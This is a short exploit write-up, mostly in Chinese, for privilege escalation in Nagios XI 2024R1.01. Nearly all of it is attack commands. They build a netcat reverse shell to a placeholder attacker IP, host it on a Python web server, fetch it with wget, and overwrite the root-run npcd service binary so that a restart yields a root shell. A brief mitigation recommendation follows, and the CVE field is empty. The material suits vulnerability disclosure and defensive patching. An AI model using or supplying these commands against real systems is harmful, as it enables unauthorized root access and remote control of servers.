
Priv esc in Nagios 2024R1.01
CVE 发现者: Jarod Jaslow (MAWK)
作为用户 "NAGIOS", 在攻击者机器上创建包含以下内容的文件:
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

通过 Python HTTP 服务器在攻击者机器上托管该文件:
python3 -m http.server 8000

在攻击者机器上启动 Netcat (NC) 监听服务器:
nc -nlvp 4445

从攻击者机器获取文件:
wget http://<Attacker IP>:8000/npcd

执行以下命令以提升权限并接收 root 连接:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


建议限制用户 "NAGIOS" 写入以 root 身份运行的 Nagios 服务可执行文件的能力。这可以通过对与 Nagios 服务相关的目录和文件实施更严格的文件权限和访问控制来实现。
这应该在新版本中修复
CVE: